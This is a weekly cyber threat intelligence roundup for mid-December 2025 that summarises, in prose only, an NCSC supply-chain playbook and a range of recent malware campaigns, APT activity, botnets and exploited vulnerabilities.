Cyware Weekly Threat Intelligence, December 15–19, 2025
The Good
UK businesses are urged to integrate the Cyber Essentials (CE) scheme into their supply chains through a new playbook from the NCSC. This playbook outlines seven actionable steps to enhance cybersecurity, including assessing supply chain risks, defining security profiles for suppliers, and utilizing the Supplier Check tool to monitor compliance. Cybersecurity minister Liz Lloyd stressed the critical need for companies to address cyber risks within their supply chains, as only 14% of firms currently manage these risks effectively.
The Bad
ESET researchers have identified LongNosedGoblin, a China-aligned APT group that has been conducting cyberespionage against targets in Southeast Asia and Japan since 2023. The group uses a tool dubbed NosyHistorian to harvest browser history for target identification. The Weaxor ransomware gang is leveraging this insecure deserialization bug to bypass authentication and lock down corporate networks before defenders even realize they have been breached. Attackers are exploiting a fake "Word Online" extension error to trick users into installing the DarkGate malware. Using the "ClickFix" social engineering technique, the campaign persuades victims to run malicious commands disguised as troubleshooting steps.
ESET researchers have identified LongNosedGoblin, a China-aligned APT group that conducts cyberespionage against governmental entities in Southeast Asia and Japan. Active since at least September 2023, the group employs a sophisticated toolset, including malware like NosyHistorian and NosyDoor, which utilize Group Policy for lateral movement and cloud services like Microsoft OneDrive for command and control. NosyHistorian collects browser history to identify potential targets, while NosyDoor functions as a backdoor, gathering metadata and executing commands remotely. The group has demonstrated advanced evasion techniques, such as bypassing security measures and masquerading as legitimate files.
The YouTube Ghost Network is a malware distribution campaign utilizing compromised accounts to promote malicious videos, primarily targeting users interested in game cheats and cracked software. A key component of this campaign is GachiLoader, a heavily obfuscated Node.js loader that deploys additional malware, including a second-stage payload known as Kidkadi. This loader employs a novel technique called Vectored Overloading for PE injection, allowing it to manipulate legitimate DLLs to load malicious payloads. The campaign has been active for over nine months, with more than 100 videos accumulating approximately 220,000 views. GachiLoader uses various anti-analysis techniques to evade detection, such as checking for virtual environments and executing PowerShell commands to gather system information.
A critical vulnerability in React2Shell (CVE-2025-55182) has been exploited by a ransomware gang to gain rapid access to corporate networks, deploying file-encrypting malware within a minute. This flaw, stemming from an insecure deserialization issue in the React Server Components' Flight protocol, allows remote code execution without authentication. Following its disclosure, both nation-state hackers and cybercriminals quickly leveraged React2Shell for various attacks, including cyberespionage and cryptocurrency mining. On December 5, a threat actor used this vulnerability to launch the Weaxor ransomware, a rebrand of the Mallox/FARGO operation, which targets public-facing servers. The attackers executed a series of commands to disable security measures and encrypt files, leaving ransom notes with payment instructions.
A sophisticated social engineering campaign is exploiting a fake “Word Online” extension error message to distribute DarkGate malware. This attack utilizes the ClickFix technique, where users are tricked into executing malicious commands disguised as legitimate troubleshooting steps. Upon encountering a fraudulent message, victims are prompted to click a “How to fix” button, which triggers a malicious JavaScript snippet. This script decodes a hidden PowerShell command that downloads an HTA file named “dark.hta” from a compromised site. Once executed, the HTA file establishes communication with the attacker’s infrastructure, allowing for the deployment of additional malware and the theft of sensitive data.
An active phishing campaign, codenamed Operation MoneyMount-ISO, is targeting the Russian finance sector by delivering Phantom Stealer malware through malicious ISO files. Phishing emails masquerade as legitimate financial communications, urging recipients to confirm bank transfers. These emails contain ZIP archives that include ISO files, which, when executed, mount as virtual drives and launch Phantom Stealer. This malware is designed to extract sensitive information, such as cryptocurrency wallet data, Discord tokens, and browser passwords. Additionally, the campaign has seen the use of another implant called DUPERUNNER, which loads the AdaptixC2 framework. The attackers employ various tactics to compromise finance, legal, and aerospace sectors in Russia, utilizing spear-phishing techniques and redirecting users to phishing pages hosted on IPFS and Vercel to steal credentials.
New Threats
The Lazarus Group is proving that old tricks can still learn new, dangerous code. A sophisticated new variant of the BeaverTail malware has been linked to this North Korean hacker group targeting cryptocurrency traders and financial institutions. A massive new botnet named Kimwolf has enslaved approximately 1.8 million Android-based devices to launch extensive DDoS attacks. A new Android MaaS called Cellik allows criminals to create trojanized versions of legitimate Google Play Store apps. Because the malware retains the original app's interface and functionality, it is nearly impossible for users to detect the infection.
A newly identified variant of the BeaverTail malware has been linked to North Korea's Lazarus Group, targeting cryptocurrency traders and financial institutions for espionage and financial gain. This JavaScript-based malware functions as both an information stealer and a loader, employing advanced obfuscation techniques such as layered Base64 and XOR encoding to conceal its activities. BeaverTail is distributed through various channels, including trojanized npm packages and fake job interview platforms, exploiting trust in development workflows. Since 2022, it has evolved into a modular, cross-platform framework capable of running on Windows, macOS, and Linux, featuring keylogging, screenshot capture, and clipboard monitoring.
Kimsuky, a North Korean threat actor, has launched a campaign distributing a new variant of Android malware called DocSwap through QR codes on phishing sites that mimic the South Korean logistics firm CJ Logistics. The attackers use smishing texts and phishing emails disguised as delivery notifications to trick victims into clicking on malicious URLs. Once redirected, users are prompted to scan a QR code to download a fake shipment tracking app, which appears legitimate but contains malware. This app decrypts an embedded APK and activates a RAT that allows attackers to log keystrokes, capture audio, and access files. Additionally, Kimsuky has repackaged legitimate applications, like the BYCOM VPN, injecting malicious functionalities. The campaign also includes phishing sites that resemble popular platforms like Naver and Kakao, aimed at harvesting user credentials.
A new botnet named Kimwolf has compromised approximately 1.8 million Android-based devices, including TVs and set-top boxes, launching extensive DDoS attacks. This botnet, linked to the notorious AISURU, has executed around 1.7 billion attack commands within a short span. Primarily targeting residential TV boxes, Kimwolf infections are prevalent in countries such as Brazil, India, and the U.S. The malware utilizes advanced techniques, including DNS-over-TLS and Ethereum Name Service (ENS) domains, to enhance its resilience against takedown efforts. Notably, over 96% of the commands issued by Kimwolf focus on exploiting compromised devices for proxy services, reflecting a shift in attackers' strategies towards monetizing IoT device bandwidth.
Cellik is a new Android MaaS being marketed on underground forums, allowing attackers to create trojanized versions of legitimate apps from the Google Play Store. This malware retains the original app's interface and functionality, making it difficult for users to detect infections. Cellik offers a variety of capabilities, including real-time screen capture, notification interception, file exfiltration, and encrypted communication with command-and-control servers. It features a hidden browser mode that utilizes the victim's stored cookies and can inject malicious code into trusted apps to steal credentials. The malware's integration with the Google Play Store enables cybercriminals to select and modify popular apps, potentially bypassing Google Play Protect's security measures.
A new campaign named GhostPoster has been discovered, which conceals malicious JavaScript within the logos of Firefox extensions, affecting over 50,000 downloads. This hidden code allows attackers to monitor browser activity and establish a backdoor for high-privilege access, enabling them to hijack affiliate links, inject tracking codes, and commit click and ad fraud. Koi Security researchers identified 17 compromised extensions that utilize steganography to extract and execute the malware loader. The loader typically activates after 48 hours, fetching payloads from hardcoded domains, but it remains dormant most of the time to evade detection. The final payload can hijack affiliate commissions, strip security headers, bypass CAPTCHA protections, and inject invisible iframes for ad fraud.
A new MaaS called SantaStealer is being promoted on Telegram and hacker forums, operating in memory to avoid detection. This malware is a rebranding of BluelineStealer and is offered in two subscription tiers: Basic for $175/month and Premium for $300/month. SantaStealer employs 14 data-collection modules, each running separately to steal information from browsers, cryptocurrency wallets, and messaging apps like Telegram and Discord. It exfiltrates stolen data in chunks to a hardcoded command-and-control endpoint. Despite claims of advanced evasion techniques, current samples have shown vulnerabilities and are easy to analyze, indicating poor operational security by the developers. The exact distribution methods for SantaStealer remain uncertain, but it may involve tactics like phishing and malicious software downloads.
A new campaign is leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based RAT called PyStoreRAT. These repositories, disguised as development utilities or OSINT tools, contain minimal code that silently downloads and executes a remote HTA file. PyStoreRAT is a modular implant capable of executing various payloads, including an information stealer named Rhadamanthys. The malware is spread through loader stubs embedded in repositories that appear appealing to developers and analysts. The threat actors utilize social media for promotion and manipulate repository metrics to appear legitimate. Once executed, PyStoreRAT can profile systems, check for administrator privileges, and scan for cryptocurrency wallet files.